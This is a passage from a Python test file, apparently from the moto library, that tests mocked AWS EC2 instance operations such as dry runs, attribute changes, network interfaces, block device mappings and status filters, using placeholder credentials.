boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)\n instances = reservation.instances\n instances.should.have.length_of(2)\n\n instance_ids = [instance.id for instance in instances]\n\n with pytest.raises(EC2ResponseError) as ex:\n stopped_instances = conn.stop_instances(instance_ids, dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the StopInstance operation: Request would have succeeded, but DryRun flag is set""\n )\n\n stopped_instances = conn.stop_instances(instance_ids)\n\n for instance in stopped_instances:\n instance.state.should.equal(""stopping"")\n\n with pytest.raises(EC2ResponseError) as ex:\n started_instances = conn.start_instances([instances[0].id], dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the StartInstance operation: Request would have succeeded, but DryRun flag is set""\n )\n\n started_instances = conn.start_instances([instances[0].id])\n started_instances[0].state.should.equal(""pending"")\n\n\n@mock_ec2_deprecated\ndef test_instance_reboot():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n instance = reservation.instances[0]\n\n with pytest.raises(EC2ResponseError) as ex:\n instance.reboot(dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the RebootInstance operation: Request would have succeeded, but DryRun flag is set""\n )\n\n instance.reboot()\n instance.state.should.equal(""pending"")\n\n\n@mock_ec2_deprecated\ndef test_instance_attribute_instance_type():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n instance = reservation.instances[0]\n\n with pytest.raises(EC2ResponseError) as ex:\n instance.modify_attribute(""instanceType"", ""m1.small"", dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the ModifyInstanceType operation: Request would have succeeded, but DryRun flag is set""\n )\n\n instance.modify_attribute(""instanceType"", ""m1.small"")\n\n instance_attribute = instance.get_attribute(""instanceType"")\n instance_attribute.should.be.a(InstanceAttribute)\n instance_attribute.get(""instanceType"").should.equal(""m1.small"")\n\n\n@mock_ec2_deprecated\ndef test_modify_instance_attribute_security_groups():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n instance = reservation.instances[0]\n\n sg_id = conn.create_security_group(\n ""test security group"", ""this is a test security group""\n ).id\n sg_id2 = conn.create_security_group(\n ""test security group 2"", ""this is a test security group 2""\n ).id\n\n with pytest.raises(EC2ResponseError) as ex:\n instance.modify_attribute(""groupSet"", [sg_id, sg_id2], dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set""\n )\n\n instance.modify_attribute(""groupSet"", [sg_id, sg_id2])\n\n instance_attribute = instance.get_attribute(""groupSet"")\n instance_attribute.should.be.a(InstanceAttribute)\n group_list = instance_attribute.get(""groupSet"")\n any(g.id == sg_id for g in group_list).should.be.ok\n any(g.id == sg_id2 for g in group_list).should.be.ok\n\n\n@mock_ec2_deprecated\ndef test_instance_attribute_user_data():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n instance = reservation.instances[0]\n\n with pytest.raises(EC2ResponseError) as ex:\n instance.modify_attribute(""userData"", ""this is my user data"", dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the ModifyUserData operation: Request would have succeeded, but DryRun flag is set""\n )\n\n instance.modify_attribute(""userData"", ""this is my user data"")\n\n instance_attribute = instance.get_attribute(""userData"")\n instance_attribute.should.be.a(InstanceAttribute)\n instance_attribute.get(""userData"").should.equal(""this is my user data"")\n\n\n@mock_ec2_deprecated\ndef test_instance_attribute_source_dest_check():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n instance = reservation.instances[0]\n\n # Default value is true\n instance.sourceDestCheck.should.equal(""true"")\n\n instance_attribute = instance.get_attribute(""sourceDestCheck"")\n instance_attribute.should.be.a(InstanceAttribute)\n instance_attribute.get(""sourceDestCheck"").should.equal(True)\n\n # Set to false (note: Boto converts bool to string, eg \'false\')\n\n with pytest.raises(EC2ResponseError) as ex:\n instance.modify_attribute(""sourceDestCheck"", False, dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the ModifySourceDestCheck operation: Request would have succeeded, but DryRun flag is set""\n )\n\n instance.modify_attribute(""sourceDestCheck"", False)\n\n instance.update()\n instance.sourceDestCheck.should.equal(""false"")\n\n instance_attribute = instance.get_attribute(""sourceDestCheck"")\n instance_attribute.should.be.a(InstanceAttribute)\n instance_attribute.get(""sourceDestCheck"").should.equal(False)\n\n # Set back to true\n instance.modify_attribute(""sourceDestCheck"", True)\n\n instance.update()\n instance.sourceDestCheck.should.equal(""true"")\n\n instance_attribute = instance.get_attribute(""sourceDestCheck"")\n instance_attribute.should.be.a(InstanceAttribute)\n instance_attribute.get(""sourceDestCheck"").should.equal(True)\n\n\n@mock_ec2_deprecated\ndef test_user_data_with_run_instance():\n user_data = b""some user data""\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, user_data=user_data)\n instance = reservation.instances[0]\n\n instance_attribute = instance.get_attribute(""userData"")\n instance_attribute.should.be.a(InstanceAttribute)\n retrieved_user_data = instance_attribute.get(""userData"").encode(""utf-8"")\n decoded_user_data = decode_method(retrieved_user_data)\n decoded_user_data.should.equal(b""some user data"")\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_security_group_name():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n\n with pytest.raises(EC2ResponseError) as ex:\n group = conn.create_security_group(""group1"", ""some description"", dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the CreateSecurityGroup operation: Request would have succeeded, but DryRun flag is set""\n )\n\n group = conn.create_security_group(""group1"", ""some description"")\n\n reservation = conn.run_instances(EXAMPLE_AMI_ID, security_groups=[""group1""])\n instance = reservation.instances[0]\n\n instance.groups[0].id.should.equal(group.id)\n instance.groups[0].name.should.equal(""group1"")\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_security_group_id():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n group = conn.create_security_group(""group1"", ""some description"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, security_group_ids=[group.id])\n instance = reservation.instances[0]\n\n instance.groups[0].id.should.equal(group.id)\n instance.groups[0].name.should.equal(""group1"")\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_instance_type():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""t1.micro"")\n instance = reservation.instances[0]\n\n instance.instance_type.should.equal(""t1.micro"")\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_default_placement():\n conn = boto.ec2.connect_to_region(""us-east-1"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n instance = reservation.instances[0]\n\n instance.placement.should.equal(""us-east-1a"")\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_placement():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, placement=""us-east-1b"")\n instance = reservation.instances[0]\n\n instance.placement.should.equal(""us-east-1b"")\n\n\n@mock_ec2\ndef test_run_instance_with_subnet_boto3():\n client = boto3.client(""ec2"", region_name=""eu-central-1"")\n\n ip_networks = [\n (ipaddress.ip_network(""10.0.0.0/16""), ipaddress.ip_network(""10.0.99.0/24"")),\n (\n ipaddress.ip_network(""192.168.42.0/24""),\n ipaddress.ip_network(""192.168.42.0/25""),\n ),\n ]\n\n # Tests instances are created with the correct IPs\n for vpc_cidr, subnet_cidr in ip_networks:\n resp = client.create_vpc(\n CidrBlock=str(vpc_cidr),\n AmazonProvidedIpv6CidrBlock=False,\n DryRun=False,\n InstanceTenancy=""default"",\n )\n vpc_id = resp[""Vpc""][""VpcId""]\n\n resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)\n subnet_id = resp[""Subnet""][""SubnetId""]\n\n resp = client.run_instances(\n ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id\n )\n instance = resp[""Instances""][0]\n instance[""SubnetId""].should.equal(subnet_id)\n\n priv_ipv4 = ipaddress.ip_address(six.text_type(instance[""PrivateIpAddress""]))\n subnet_cidr.should.contain(priv_ipv4)\n\n\n@mock_ec2\ndef test_run_instance_with_specified_private_ipv4():\n client = boto3.client(""ec2"", region_name=""eu-central-1"")\n\n vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"")\n subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"")\n\n resp = client.create_vpc(\n CidrBlock=str(vpc_cidr),\n AmazonProvidedIpv6CidrBlock=False,\n DryRun=False,\n InstanceTenancy=""default"",\n )\n vpc_id = resp[""Vpc""][""VpcId""]\n\n resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)\n subnet_id = resp[""Subnet""][""SubnetId""]\n\n resp = client.run_instances(\n ImageId=EXAMPLE_AMI_ID,\n MaxCount=1,\n MinCount=1,\n SubnetId=subnet_id,\n PrivateIpAddress=""127.0.0.1"",\n )\n instance = resp[""Instances""][0]\n instance[""SubnetId""].should.equal(subnet_id)\n instance[""PrivateIpAddress""].should.equal(""127.0.0.1"")\n\n\n@mock_ec2\ndef test_run_instance_mapped_public_ipv4():\n client = boto3.client(""ec2"", region_name=""eu-central-1"")\n\n vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"")\n subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"")\n\n resp = client.create_vpc(\n CidrBlock=str(vpc_cidr),\n AmazonProvidedIpv6CidrBlock=False,\n DryRun=False,\n InstanceTenancy=""default"",\n )\n vpc_id = resp[""Vpc""][""VpcId""]\n\n resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)\n subnet_id = resp[""Subnet""][""SubnetId""]\n client.modify_subnet_attribute(\n SubnetId=subnet_id, MapPublicIpOnLaunch={""Value"": True}\n )\n\n resp = client.run_instances(\n ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id\n )\n instance = resp[""Instances""][0]\n instance.should.contain(""PublicDnsName"")\n instance.should.contain(""PublicIpAddress"")\n len(instance[""PublicDnsName""]).should.be.greater_than(0)\n len(instance[""PublicIpAddress""]).should.be.greater_than(0)\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_nic_autocreated():\n conn = boto.connect_vpc(""the_key"", ""the_secret"")\n vpc = conn.create_vpc(""10.0.0.0/16"")\n subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"")\n security_group1 = conn.create_security_group(\n ""test security group #1"", ""this is a test security group""\n )\n security_group2 = conn.create_security_group(\n ""test security group #2"", ""this is a test security group""\n )\n private_ip = ""127.0.0.1""\n\n reservation = conn.run_instances(\n EXAMPLE_AMI_ID,\n subnet_id=subnet.id,\n security_groups=[security_group1.name],\n security_group_ids=[security_group2.id],\n private_ip_address=private_ip,\n )\n instance = reservation.instances[0]\n\n all_enis = conn.get_all_network_interfaces()\n all_enis.should.have.length_of(1)\n eni = all_enis[0]\n\n instance.interfaces.should.have.length_of(1)\n instance.interfaces[0].id.should.equal(eni.id)\n\n instance.subnet_id.should.equal(subnet.id)\n instance.groups.should.have.length_of(2)\n set([group.id for group in instance.groups]).should.equal(\n set([security_group1.id, security_group2.id])\n )\n\n eni.subnet_id.should.equal(subnet.id)\n eni.groups.should.have.length_of(2)\n set([group.id for group in eni.groups]).should.equal(\n set([security_group1.id, security_group2.id])\n )\n eni.private_ip_addresses.should.have.length_of(1)\n eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_nic_preexisting():\n conn = boto.connect_vpc(""the_key"", ""the_secret"")\n vpc = conn.create_vpc(""10.0.0.0/16"")\n subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"")\n security_group1 = conn.create_security_group(\n ""test security group #1"", ""this is a test security group""\n )\n security_group2 = conn.create_security_group(\n ""test security group #2"", ""this is a test security group""\n )\n private_ip = ""127.0.0.1""\n eni = conn.create_network_interface(\n subnet.id, private_ip, groups=[security_group1.id]\n )\n\n # Boto requires NetworkInterfaceCollection of NetworkInterfaceSpecifications...\n # annoying, but generates the desired querystring.\n from boto.ec2.networkinterface import (\n NetworkInterfaceSpecification,\n NetworkInterfaceCollection,\n )\n\n interface = NetworkInterfaceSpecification(\n network_interface_id=eni.id, device_index=0\n )\n interfaces = NetworkInterfaceCollection(interface)\n # end Boto objects\n\n reservation = conn.run_instances(\n EXAMPLE_AMI_ID,\n network_interfaces=interfaces,\n security_group_ids=[security_group2.id],\n )\n instance = reservation.instances[0]\n\n instance.subnet_id.should.equal(subnet.id)\n\n all_enis = conn.get_all_network_interfaces()\n all_enis.should.have.length_of(1)\n\n instance.interfaces.should.have.length_of(1)\n instance_eni = instance.interfaces[0]\n instance_eni.id.should.equal(eni.id)\n\n instance_eni.subnet_id.should.equal(subnet.id)\n instance_eni.groups.should.have.length_of(2)\n set([group.id for group in instance_eni.groups]).should.equal(\n set([security_group1.id, security_group2.id])\n )\n instance_eni.private_ip_addresses.should.have.length_of(1)\n instance_eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)\n\n\n@requires_boto_gte(""2.32.0"")\n@mock_ec2_deprecated\ndef test_instance_with_nic_attach_detach():\n conn = boto.connect_vpc(""the_key"", ""the_secret"")\n vpc = conn.create_vpc(""10.0.0.0/16"")\n subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"")\n\n security_group1 = conn.create_security_group(\n ""test security group #1"", ""this is a test security group""\n )\n security_group2 = conn.create_security_group(\n ""test security group #2"", ""this is a test security group""\n )\n\n reservation = conn.run_instances(\n EXAMPLE_AMI_ID, security_group_ids=[security_group1.id]\n )\n instance = reservation.instances[0]\n\n eni = conn.create_network_interface(subnet.id, groups=[security_group2.id])\n\n # Check initial instance and ENI data\n instance.interfaces.should.have.length_of(1)\n\n eni.groups.should.have.length_of(1)\n set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))\n\n # Attach\n with pytest.raises(EC2ResponseError) as ex:\n conn.attach_network_interface(eni.id, instance.id, device_index=1, dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the AttachNetworkInterface operation: Request would have succeeded, but DryRun flag is set""\n )\n\n conn.attach_network_interface(eni.id, instance.id, device_index=1)\n\n # Check attached instance and ENI data\n instance.update()\n instance.interfaces.should.have.length_of(2)\n instance_eni = instance.interfaces[1]\n instance_eni.id.should.equal(eni.id)\n instance_eni.groups.should.have.length_of(2)\n set([group.id for group in instance_eni.groups]).should.equal(\n set([security_group1.id, security_group2.id])\n )\n\n eni = conn.get_all_network_interfaces(filters={""network-interface-id"": eni.id})[0]\n eni.groups.should.have.length_of(2)\n set([group.id for group in eni.groups]).should.equal(\n set([security_group1.id, security_group2.id])\n )\n\n # Detach\n with pytest.raises(EC2ResponseError) as ex:\n conn.detach_network_interface(instance_eni.attachment.id, dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the DetachNetworkInterface operation: Request would have succeeded, but DryRun flag is set""\n )\n\n conn.detach_network_interface(instance_eni.attachment.id)\n\n # Check detached instance and ENI data\n instance.update()\n instance.interfaces.should.have.length_of(1)\n\n eni = conn.get_all_network_interfaces(filters={""network-interface-id"": eni.id})[0]\n eni.groups.should.have.length_of(1)\n set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))\n\n # Detach with invalid attachment ID\n with pytest.raises(EC2ResponseError) as cm:\n conn.detach_network_interface(""eni-attach-1234abcd"")\n cm.value.code.should.equal(""InvalidAttachmentID.NotFound"")\n cm.value.status.should.equal(400)\n cm.value.request_id.should_not.be.none\n\n\n@mock_ec2_deprecated\ndef test_ec2_classic_has_public_ip_address():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"")\n instance = reservation.instances[0]\n instance.ip_address.should_not.equal(None)\n instance.public_dns_name.should.contain(instance.ip_address.replace(""."", ""-""))\n instance.private_ip_address.should_not.equal(None)\n instance.private_dns_name.should.contain(\n instance.private_ip_address.replace(""."", ""-"")\n )\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_keypair():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"")\n instance = reservation.instances[0]\n\n instance.key_name.should.equal(""keypair_name"")\n\n\n@mock_ec2\ndef test_run_instance_with_block_device_mappings():\n ec2_client = boto3.client(""ec2"", region_name=""us-east-1"")\n\n kwargs = {\n ""MinCount"": 1,\n ""MaxCount"": 1,\n ""ImageId"": EXAMPLE_AMI_ID,\n ""KeyName"": ""the_key"",\n ""InstanceType"": ""t1.micro"",\n ""BlockDeviceMappings"": [{""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeSize"": 50}}],\n }\n\n ec2_client.run_instances(**kwargs)\n\n instances = ec2_client.describe_instances()\n volume = instances[""Reservations""][0][""Instances""][0][""BlockDeviceMappings""][0][\n ""Ebs""\n ]\n\n volumes = ec2_client.describe_volumes(VolumeIds=[volume[""VolumeId""]])\n volumes[""Volumes""][0][""Size""].should.equal(50)\n\n\n@mock_ec2\ndef test_run_instance_with_block_device_mappings_missing_ebs():\n ec2_client = boto3.client(""ec2"", region_name=""us-east-1"")\n\n kwargs = {\n ""MinCount"": 1,\n ""MaxCount"": 1,\n ""ImageId"": EXAMPLE_AMI_ID,\n ""KeyName"": ""the_key"",\n ""InstanceType"": ""t1.micro"",\n ""BlockDeviceMappings"": [{""DeviceName"": ""/dev/sda2""}],\n }\n with pytest.raises(ClientError) as ex:\n ec2_client.run_instances(**kwargs)\n\n ex.value.response[""Error""][""Code""].should.equal(""MissingParameter"")\n ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400)\n ex.value.response[""Error""][""Message""].should.equal(\n ""The request must contain the parameter ebs""\n )\n\n\n@mock_ec2\ndef test_run_instance_with_block_device_mappings_missing_size():\n ec2_client = boto3.client(""ec2"", region_name=""us-east-1"")\n\n kwargs = {\n ""MinCount"": 1,\n ""MaxCount"": 1,\n ""ImageId"": EXAMPLE_AMI_ID,\n ""KeyName"": ""the_key"",\n ""InstanceType"": ""t1.micro"",\n ""BlockDeviceMappings"": [\n {""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeType"": ""standard""}}\n ],\n }\n with pytest.raises(ClientError) as ex:\n ec2_client.run_instances(**kwargs)\n\n ex.value.response[""Error""][""Code""].should.equal(""MissingParameter"")\n ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400)\n ex.value.response[""Error""][""Message""].should.equal(\n ""The request must contain the parameter size or snapshotId""\n )\n\n\n@mock_ec2\ndef test_run_instance_with_block_device_mappings_from_snapshot():\n ec2_client = boto3.client(""ec2"", region_name=""us-east-1"")\n ec2_resource = boto3.resource(""ec2"", region_name=""us-east-1"")\n volume_details = {\n ""AvailabilityZone"": ""1a"",\n ""Size"": 30,\n }\n\n volume = ec2_resource.create_volume(**volume_details)\n snapshot = volume.create_snapshot()\n kwargs = {\n ""MinCount"": 1,\n ""MaxCount"": 1,\n ""ImageId"": EXAMPLE_AMI_ID,\n ""KeyName"": ""the_key"",\n ""InstanceType"": ""t1.micro"",\n ""BlockDeviceMappings"": [\n {""DeviceName"": ""/dev/sda2"", ""Ebs"": {""SnapshotId"": snapshot.snapshot_id}}\n ],\n }\n\n ec2_client.run_instances(**kwargs)\n\n instances = ec2_client.describe_instances()\n volume = instances[""Reservations""][0][""Instances""][0][""BlockDeviceMappings""][0][\n ""Ebs""\n ]\n\n volumes = ec2_client.describe_volumes(VolumeIds=[volume[""VolumeId""]])\n\n volumes[""Volumes""][0][""Size""].should.equal(30)\n volumes[""Volumes""][0][""SnapshotId""].should.equal(snapshot.snapshot_id)\n\n\n@mock_ec2_deprecated\ndef test_describe_instance_status_no_instances():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n all_status = conn.get_all_instance_status()\n len(all_status).should.equal(0)\n\n\n@mock_ec2_deprecated\ndef test_describe_instance_status_with_instances():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"")\n\n all_status = conn.get_all_instance_status()\n len(all_status).should.equal(1)\n all_status[0].instance_status.status.should.equal(""ok"")\n all_status[0].system_status.status.should.equal(""ok"")\n\n\n@mock_ec2_deprecated\ndef test_describe_instance_status_with_instance_filter_deprecated():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n\n # We want to filter based on this one\n reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"")\n instance = reservation.instances[0]\n\n # This is just to setup the test\n conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"")\n\n all_status = conn.get_all_instance_status(instance_ids=[instance.id])\n len(all_status).should.equal(1)\n all_status[0].id.should.equal(instance.id)\n\n # Call get_all_instance_status with a bad id should raise an error\n with pytest.raises(EC2ResponseError) as cm:\n conn.get_all_instance_status(instance_ids=[instance.id, ""i-1234abcd""])\n cm.value.code.should.equal(""InvalidInstanceID.NotFound"")\n cm.value.status.should.equal(400)\n cm.value.request_id.should_not.be.none\n\n\n@mock_ec2\ndef test_describe_instance_credit_specifications():\n conn = boto3.client(""ec2"", region_name=""us-west-1"")\n\n # We want to filter based on this one\n reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)\n result = conn.describe_instance_credit_specifications(\n InstanceIds=[reservation[""Instances""][0][""InstanceId""]]\n )\n assert (\n result[""InstanceCreditSpecifications""][0][""InstanceId""]\n == reservation[""Instances""][0][""InstanceId""]\n )\n\n\n@mock_ec2\ndef test_describe_instance_status_with_instance_filter():\n conn = boto3.client(""ec2"", region_name=""us-west-1"")\n\n # We want to filter based on this one\n reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=3, MaxCount=3)\n instance1 = reservation[""Instances""][0]\n instance2 = reservation[""Instances""][1]\n instance3 = reservation[""Instances""][2]\n conn.stop_instances(InstanceIds=[instance1[""InstanceId""]])\n stopped_instance_ids = [instance1[""InstanceId""]]\n running_instance_ids = sorted([instance2[""InstanceId""], instance3[""InstanceId""]])\n all_instance_ids = sorted(stopped_instance_ids + running_instance_ids)\n\n # Filter instance using the state name\n state_name_filter = {\n ""running_and_stopped"": [\n {""Name"": ""instance-state-name"", ""Values"": [""running"", ""stopped""]}\n ],\n ""running"": [{""Name"": ""instance-state-name"", ""Values"": [""running""]}],\n ""stopped"": [{""Name"": ""instance-state-name"", ""Values"": [""stopped""]}],\n }\n\n found_statuses = conn.describe_instance_status(\n IncludeAllInstances=True, Filters=state_name_filter[""running_and_stopped""]\n )[""InstanceStatuses""]\n found_instance_ids = [status[""InstanceId""] for status in found_statuses]\n sorted(found_instance_ids).should.equal(all_instance_ids)\n\n found_statuses = conn.describe_instance_status(\n IncludeAllInstances=True, Filters=state_name_filter[""running""]\n )[""InstanceStatuses""]\n found_instance_ids = [status[""InstanceId""] for status in found_statuses]\n sorted(found_instance_ids).should.equal(running_instance_ids)\n\n found_statuses = conn.describe_instance_status(\n IncludeAllInstances=True, Filters=state_name_filter[""stopped""]\n )[""InstanceStatuses""]\n found_instance_ids = [status[""InstanceId""] for status in found_statuses]\n sorted(found_instance_ids).should.equal(stopped_instance_ids)\n\n # Filter instance using the state code\n state_code_filter = {\n ""running_and_stopped"": [\n {""Name"": ""instance-state-code"", ""Values"": [""16"", ""80""]}\n ],\n ""running"": [{""Name"": ""instance-state-code"", ""Values"": [""16""]}],\n ""stopped"": [{""Name"": ""instance-state-code"", ""Values"": [""80""]}],\n }\n\n found_statuses = conn.describe_instance_status(\n IncludeAllInstances=True, Filters=state_code_filter[""running_and_stopped""]\n )[""InstanceStatuses""]\n found_instance_ids = [status[""InstanceId""] for status in found_statuses]\n sorted(found_instance_ids).should.equal(all_instance_ids)\n\n found_statuses = conn.describe_instance_status(\n IncludeAllInstances=True, Filters=state_code_filter[""running""]\n )[""InstanceStatuses""]\n found_instance_ids = [status[""InstanceId""] for status in found_statuses]\n sorted(found_instance_ids).should.equal(running_instance_ids)\n\n found_statuses = conn.describe_instance_status(\n IncludeAllInstances=True, Filters=state_code_filter[""stopped""]\n )[""InstanceStatuses""]\n found_instance_ids = [status[""InstanceId""] for status in found_statuses]\n sorted(found_instance_ids).should.equal(stopped_instance_ids)\n\n\n@requires_boto_gte(""2.32.0"")\n@mock_ec2_deprecated\ndef test_describe_instance_status_with_non_running_instances():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)\n instance1, instance2, instance3 = reservation.instances\n instance1.stop()\n instance2.terminate()\n\n all_running_status = conn.get_all_instance_status()\n all_running_status.should.have.length_of(1)\n all_running_status[0].id.should.equal(instance3.id)\n all_running_status[0].state_name.should.equal(""running"")\n\n all_status = conn.get_all_instance_status(include_all_instances=True)\n all_status.should.have.length_of(3)\n\n status1 = next((s for s in all_status if s.id == instance1.id), None)\n status1.state_name.should.equal(""stopped"")\n\n status2 = next((s for s in all_status if s.id == instance2.id), None)\n status2.state_name.should.equal(""terminated"")\n\n status3 = next((s for s in all_status if s.id == instance3.id), None)\n status3.state_name.should.equal(""running"")\n\n\n@mock_ec2_deprecated\ndef test_get_instance_by_security_group():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n\n conn.run_instances(EXAMPLE_AMI_ID)\n instance = conn.get_only_instances()[0]\n\n security_group = conn.create_security_group(""test"", ""test"")\n\n with pytest.raises(EC2ResponseError) as ex:\n conn.modify_instance_attribute(\n instance.id, ""groupSet"", [security_group.id], dry_run=True\n )\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set""\n )\n\n conn.modify_instance_attribute(instance.id, ""groupSet"", [security_group.id])\n\n security_group_instances = security_group.instances()\n\n assert len(security_group_instances) == 1\n assert security_group_instances[0].id == instance.id\n\n\n@mock_ec2\ndef test_modify_delete_on_termination():\n ec2_client = boto3.resource(""ec2"", region_name=""us-west-1"")\n result = ec2_client.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)\n instance = result[0]\n instance.load()\n instance.block_device_mappings[0][""Ebs""][""DeleteOnTermination""].should.be(True)\n instance.modify_attribute(\n BlockDeviceMappings=[\n {""DeviceName"": ""/dev/sda1"", ""Ebs"": {""DeleteOnTermination"": False}}\n ]\n )\n instance.load()\n instance.block_device_mappings[0][""Ebs""][""DeleteOnTermination""].should.be(False)\n\n\n@mock_ec2\ndef test_create_instance_ebs_optimized():\n ec2_resource = boto3.resource(""ec2"", region_name=""eu-west-1"")\n\n instance = ec2_resource.create_instances(\n ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, EbsOptimized=True\n )[0]\n instance.load()\n instance.ebs_optimized.should.be(True)\n\n instance.modify_attribute(EbsOptimized={""Value"": False})\n instance.load()\n instance.ebs_optimized.should.be(False)\n\n instance = ec2_resource.create_instances(\n ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1,\n )[0]\n instance.load()\n instance.ebs_optimized.should.be(False)\n\n\n@mock_ec2\ndef test_run_multiple_instances_in_same_command():\n instance_count = 4\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n client.run_instances(\n ImageId=EXAMPLE_AMI_ID, MinCount=instance_count, MaxCount=instance_count\n )\n reservations = client.describe_instances()[""Reservations""]\n\n reservations[0][""Instances""].should.have.length_of(instance_count)\n\n instances = reservations[0][""Instances""]\n for i in range(0, instance_count):\n instances[i][""AmiLaunchIndex""].should.be(i)\n\n\n@mock_ec2\ndef test_describe_instance_attribute():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n security_group_id = client.create_security_group(\n GroupName=""test security group"", Description=""this is a test security group""\n )[""GroupId""]\n client.run_instances(\n ImageId=EXAMPLE_AMI_ID,\n MinCount=1,\n MaxCount=1,\n SecurityGroupIds=[security_group_id],\n )\n instance_id = client.describe_instances()[""Reservations""][0][""Instances""][0][\n ""InstanceId""\n ]\n\n valid_instance_attributes = [\n ""instanceType"",\n ""kernel"",\n ""ramdisk"",\n ""userData"",\n ""disableApiTermination"",\n ""instanceInitiatedShutdownBehavior"",\n ""rootDeviceName"",\n ""blockDeviceMapping"",\n ""productCodes"",\n ""sourceDestCheck"",\n ""groupSet"",\n 